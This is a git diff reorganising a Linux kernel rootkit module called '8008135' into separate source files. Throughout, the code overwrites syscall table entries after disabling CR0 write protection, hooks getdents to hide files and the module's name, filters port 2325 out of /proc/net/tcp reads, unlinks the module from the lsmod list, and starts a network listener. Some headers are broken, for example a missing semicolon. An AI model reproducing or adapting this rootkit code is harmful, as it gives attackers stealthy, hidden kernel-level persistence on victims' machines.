diff --git a/Makefile b/Makefile
index 255fc67..1c688ae 100644
--- a/Makefile
+++ b/Makefile
@@ -20,6 +20,10 @@ obj-m += $(MNAME).o
# Core
$(MNAME)-y += src/$(MNAME).o
$(MNAME)-y += src/50ck3t.o
+$(MNAME)-y += src/637d3n75.o
+$(MNAME)-y += src/h1d3p0r7.o
+$(MNAME)-y += src/h1d3m0dul3.o
+$(MNAME)-y += src/p463unpr073c7.o
# Includes for header files etc
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)
diff --git a/src/637d3n75.c b/src/637d3n75.c
new file mode 100644
index 0000000..24afd60
--- /dev/null
+++ b/src/637d3n75.c
@@ -0,0 +1,72 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+/*******************************************************************************/
+
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "637d3n75.h"
+
+
+/*******************************************************************************/
+
+/*** FUNCTION ****************************************************************
+* NAME: sys_getdents_new
+* DESCRIPTION: function overriding the original getdents
+* PARAMETERS: -
+* RETURNS: -
+*******************************************************************************/
+asmlinkage long sys_getdents_new(unsigned int fd,
+ struct linux_dirent __user *dirent,
+ unsigned int count){
+ int boff;
+ struct linux_dirent* ent;
+
+ long ret = sys_getdents_orig(fd, dirent, count);
+
+ char* dbuf;
+
+ if (ret <= 0) {
+ return ret;
+ }
+
+ dbuf = (char*)dirent;
+
+ // go through the entries, looking for one that has our prefix
+ for (boff = 0; boff < ret;) {
+
+ ent = (struct linux_dirent*)(dbuf + boff);
+
+ // if it has hide prefix or module name anywhere, hide it
+ if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
+ || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
+ // remove this entry by copying everything after it forward
+ // and adjust the length reported
+ memcpy(dbuf + boff,
+ dbuf + boff + ent->d_reclen,
+ ret - (boff + ent->d_reclen));
+ ret -= ent->d_reclen;
+ } else {
+ // on to the next entry
+ boff += ent->d_reclen;
+ }
+ }
+
+ return ret;
+}
diff --git a/src/8008135.c b/src/8008135.c
index 2189d71..c8be593 100644
--- a/src/8008135.c
+++ b/src/8008135.c
@@ -17,167 +17,35 @@
* with this program. If not, see .
*/
+/*******************************************************************************/
+
/**** includes *****************************************************************
*******************************************************************************/
#include "8008135.h"
#include "50ck3t.h"
-/**** var ********************************************************************
-*******************************************************************************/
-
-sys_getdents_t sys_getdents_orig = NULL;
-
-/*** FUNCTION ****************************************************************
-* NAME: sys_getdents_new
-* DESCRIPTION: function overriding the original getdents
-* PARAMETERS: -
-* RETURNS: -
-*******************************************************************************/
-asmlinkage long sys_getdents_new(unsigned int fd,
- struct linux_dirent __user *dirent,
- unsigned int count){
- int boff;
- struct linux_dirent* ent;
-
- long ret = sys_getdents_orig(fd, dirent, count);
-
- char* dbuf;
-
- if (ret <= 0) {
- return ret;
- }
-
- dbuf = (char*)dirent;
-
- // go through the entries, looking for one that has our prefix
- for (boff = 0; boff < ret;) {
-
- ent = (struct linux_dirent*)(dbuf + boff);
-
- // if it has hide prefix or module name anywhere, hide it
- if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
- || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
-#if defined DEBUG
- printk("\n hide prefix or mod name contained!\n");
- printk("\n ret %ld\n ", ret);
- printk("\n dbuf %d\n" , dbuf);
- printk("\n");
- printk(ent->d_name);
-#endif
- // remove this entry by copying everything after it forward
- // and adjust the length reported
-#if defined DEBUG
- printk("\n reclen %u \n", ent->d_reclen);
-#endif
- memcpy(dbuf + boff,
- dbuf + boff + ent->d_reclen,
- ret - (boff + ent->d_reclen));
- ret -= ent->d_reclen;
-#if defined DEBUG
- printk("\n ret after change %ld\n ", ret);
-#endif
- } else {
- // on to the next entry
- boff += ent->d_reclen;
- }
- }
-
- return ret;
-}
-
-
-/*** FUNCTION ****************************************************************
-* NAME: hide port
-* DESCRIPTION: hides the port 2325
-* PARAMETERS: -
-* RETURNS:
-*******************************************************************************/
-read_ptr orig_read;
-asmlinkage long hacked_read(unsigned int fd, char __user *buf,
- size_t count)
-{
- long result, bp, diff_in_bytes;
- char *kbuf, *start_line, *end_line, *port_num;
- char *pathname, pbuf[256];
- struct files_struct *current_files;
- struct fdtable *files_table;
- struct path file_path;
-
- // run real read
- result = (*orig_read)(fd,buf,count);
- if (result <= 0)
- return result;
-
- // get pathname
- // CITATION [8] from report
- current_files = current->files;
- files_table = files_fdtable(current_files);
-
- file_path = files_table->fd[fd]->f_path;
- pathname = d_path(&file_path,pbuf,256*sizeof(char));
- // if virtual file /proc/net/tcp
- if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
- // copy from user to kernelspace;
- if (!access_ok(VERIFY_READ,buf,result))
- return -1;
- if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
- return -1;
- if (copy_from_user(kbuf,buf,result))
- return -1;
-
- // filter out hidden ports
- start_line = strchr(kbuf,':') - 4; // skip first line
- diff_in_bytes = (start_line - kbuf) * sizeof(char);
- for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
- start_line = kbuf + bp;
- port_num = strchr(strchr(start_line,':') + 1,':') + 1;
- end_line = strchr(start_line,'\n');
- diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
- if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
- memmove(start_line,end_line + 1, // delete line in file
- result - bp - diff_in_bytes);
- result -= diff_in_bytes;
- }
- }
-
- // copy from kernel to userspace
- if (!access_ok(VERIFY_WRITE,buf,result))
- return EINVAL;
- if (copy_to_user(buf,kbuf,result))
- return EINVAL;
- kfree(kbuf);
- }
- // return number of bytes read
- return result;
-}
-
-
-/*** FUNCTION ****************************************************************
-* NAME: hide_module
-* DESCRIPTION: hides the module from lsmod
-* PARAMETERS: -
-* RETURNS:
-*******************************************************************************/
-void hide_module(void){
- list_del(&THIS_MODULE->list);
-}
+#include "637d3n75.h"
+#include "h1d3m0dul3.h"
+#include "h1d3p0r7.h"
+#include "p463unpr073c7.h"
+/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: 8008135_init
-* DESCRIPTION: initializing Kernel Module
+* DESCRIPTION: initializing Kernel Module - hijacking syscalltable
* PARAMETERS: -
* RETURNS: int
*******************************************************************************/
static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
- // record the original getdents handler
+
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
// turn write protect off
- write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+ wprotectionoff();
// add our new handlers
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
@@ -187,7 +55,7 @@ static int __init init_8008135(void) {
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;
// turn write protect back on
- write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+ wprotectionon();
printk(KERN_INFO "New syscall in place\n");
network_server_init();
@@ -205,16 +73,17 @@ static int __init init_8008135(void) {
*******************************************************************************/
static void __exit exit_8008135(void) {
network_server_exit();
- // allow us to write to read onlu pages
- write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
- // set getdents handler back
+ wprotectionoff();
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
// turn write protect back on
- write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+ wprotectionon();
printk(KERN_INFO "Old syscall back\n");
}
-// Setting pointers to init-/exit-functions
+/*******************************************************************************/
+
module_init(init_8008135);
module_exit(exit_8008135);
+
+/*******************************************************************************/
diff --git a/src/h1d3m0dul3.c b/src/h1d3m0dul3.c
new file mode 100644
index 0000000..3a8ce87
--- /dev/null
+++ b/src/h1d3m0dul3.c
@@ -0,0 +1,36 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "h1d3m0dul3.h"
+
+/*******************************************************************************/
+
+/*** FUNCTION ****************************************************************
+* NAME: hide_module
+* DESCRIPTION: hides the module from lsmod
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+void hide_module(void){
+ list_del(&THIS_MODULE->list);
+}
diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c
new file mode 100644
index 0000000..f16e715
--- /dev/null
+++ b/src/h1d3p0r7.c
@@ -0,0 +1,91 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "h1d3p0r7.h"
+
+/*******************************************************************************/
+
+/*** FUNCTION ****************************************************************
+* NAME: hide port
+* DESCRIPTION: hides the port 2325
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+
+asmlinkage long hacked_read(unsigned int fd, char __user *buf,
+ size_t count)
+{
+ long result, bp, diff_in_bytes;
+ char *kbuf, *start_line, *end_line, *port_num;
+ char *pathname, pbuf[256];
+ struct files_struct *current_files;
+ struct fdtable *files_table;
+ struct path file_path;
+
+ // run real read
+ result = (*orig_read)(fd,buf,count);
+ if (result <= 0)
+ return result;
+
+ // get pathname
+ // CITATION [8] from report
+ current_files = current->files;
+ files_table = files_fdtable(current_files);
+
+ file_path = files_table->fd[fd]->f_path;
+ pathname = d_path(&file_path,pbuf,256*sizeof(char));
+ // if virtual file /proc/net/tcp
+ if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
+ // copy from user to kernelspace;
+ if (!access_ok(VERIFY_READ,buf,result))
+ return -1;
+ if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
+ return -1;
+ if (copy_from_user(kbuf,buf,result))
+ return -1;
+
+ // filter out hidden ports
+ start_line = strchr(kbuf,':') - 4; // skip first line
+ diff_in_bytes = (start_line - kbuf) * sizeof(char);
+ for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
+ start_line = kbuf + bp;
+ port_num = strchr(strchr(start_line,':') + 1,':') + 1;
+ end_line = strchr(start_line,'\n');
+ diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
+ if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
+ memmove(start_line,end_line + 1, // delete line in file
+ result - bp - diff_in_bytes);
+ result -= diff_in_bytes;
+ }
+ }
+
+ // copy from kernel to userspace
+ if (!access_ok(VERIFY_WRITE,buf,result))
+ return EINVAL;
+ if (copy_to_user(buf,kbuf,result))
+ return EINVAL;
+ kfree(kbuf);
+ }
+ // return number of bytes read
+ return result;
+}
diff --git a/src/headers/50ck3t.h b/src/headers/50ck3t.h
index b9c7b35..b67c59d 100644
--- a/src/headers/50ck3t.h
+++ b/src/headers/50ck3t.h
@@ -16,8 +16,8 @@
* You should have received a copy of the GNU General Public License along
* with this program. If not, see .
*/
-#ifndef SRC_HEADERS_50CK3T_H_
-#define SRC_HEADERS_50CK3T_H_
+#ifndef SRC_HEADERS_50CK3T_H
+#define SRC_HEADERS_50CK3T_H
/**** includes *****************************************************************
*******************************************************************************/
@@ -40,11 +40,15 @@
#include
#include
+/**** defines *****************************************************************
+*******************************************************************************/
+
#define DEFAULT_PORT 2325
+#define DEFAULT_PORT_HEX "0915"
#define MAX_CONNS 16
#define MODULE_NAME "8008135"
int network_server_init(void);
void network_server_exit(void);
-#endif /* SRC_HEADERS_50CK3T_H_ */
+#endif
diff --git a/src/headers/5y563n.h b/src/headers/5y563n.h
new file mode 100644
index 0000000..1b102b4
--- /dev/null
+++ b/src/headers/5y563n.h
@@ -0,0 +1,2 @@
+#pragma once
+#include
diff --git a/src/headers/637d3n75.h b/src/headers/637d3n75.h
new file mode 100644
index 0000000..feab7cf
--- /dev/null
+++ b/src/headers/637d3n75.h
@@ -0,0 +1,32 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+#ifndef SRC_HEADERS_637d3n75_H
+#define SRC_HEADERS_637d3n75_H
+
+/**** var ********************************************************************
+*******************************************************************************/
+sys_getdents_t sys_getdents_orig = NULL;
+
+
+extern asmlinkage long sys_getdents_new(unsigned int fd,
+ struct linux_dirent __user *dirent,
+ unsigned int count);
+
+#endif
diff --git a/src/headers/8008135.h b/src/headers/8008135.h
index 0ff10ae..99bc790 100644
--- a/src/headers/8008135.h
+++ b/src/headers/8008135.h
@@ -42,14 +42,12 @@
#define GETDENTS_SYSCALL_NUM 78
#define READ_SYSCALL_NUM 0
-#define WRITE_PROTECT_FLAG (1<<16)
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
-#define HIDE_PORT "0915" // 2325 in Hexadecimal
/**** Modinfo ****************************************************************
*******************************************************************************/
@@ -73,4 +71,4 @@ typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
unsigned int count);
typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf,
size_t count);
-#endif /* SRC_HEADERS_8008135_H */
+#endif
diff --git a/src/headers/h1d3m0dul3.h b/src/headers/h1d3m0dul3.h
new file mode 100644
index 0000000..14182ae
--- /dev/null
+++ b/src/headers/h1d3m0dul3.h
@@ -0,0 +1,26 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+#ifndef SRC_HEADERS_h1d3m0dul3_H
+#define SRC_HEADERS_h1d3m0dul3_H
+
+
+extern void hide_module(void);
+
+#endif
diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h
new file mode 100644
index 0000000..65ab39d
--- /dev/null
+++ b/src/headers/h1d3p0r7.h
@@ -0,0 +1,31 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+#ifndef SRC_HEADERS_h1d3p0r7_H
+#define SRC_HEADERS_h1d3p0r7_H
+
+#include "50ck3t.h"
+/**** var **********************************************************************
+*******************************************************************************/
+read_ptr orig_read;
+
+extern asmlinkage long hacked_read(unsigned int fd, char __user *buf,
+ size_t count)
+
+#endif
diff --git a/src/headers/p463unpr073c7.h b/src/headers/p463unpr073c7.h
new file mode 100644
index 0000000..a474e8f
--- /dev/null
+++ b/src/headers/p463unpr073c7.h
@@ -0,0 +1,31 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+#ifndef SRC_HEADERS_p463unpr073c7_H
+#define SRC_HEADERS_p463unpr073c7_H
+
+
+/**** defines *****************************************************************
+*******************************************************************************/
+#define WRITE_PROTECT_FLAG (1<<16)
+
+extern void wprotectionoff(void);
+extern void wprotectionon(void);
+
+#endif
diff --git a/src/p463unpr073c7.c b/src/p463unpr073c7.c
new file mode 100644
index 0000000..904825a
--- /dev/null
+++ b/src/p463unpr073c7.c
@@ -0,0 +1,48 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "p463unpr073c7.h"
+
+/*******************************************************************************/
+
+
+/*** FUNCTION ****************************************************************
+* NAME: wprotectionoff
+* DESCRIPTION: turn page write protection off
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+void wprotectionoff(void){
+ write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+}
+
+/*** FUNCTION ****************************************************************
+* NAME: wprotectionon
+* DESCRIPTION: turn page write protection on
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+
+void wprotectionon(void){
+ write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+}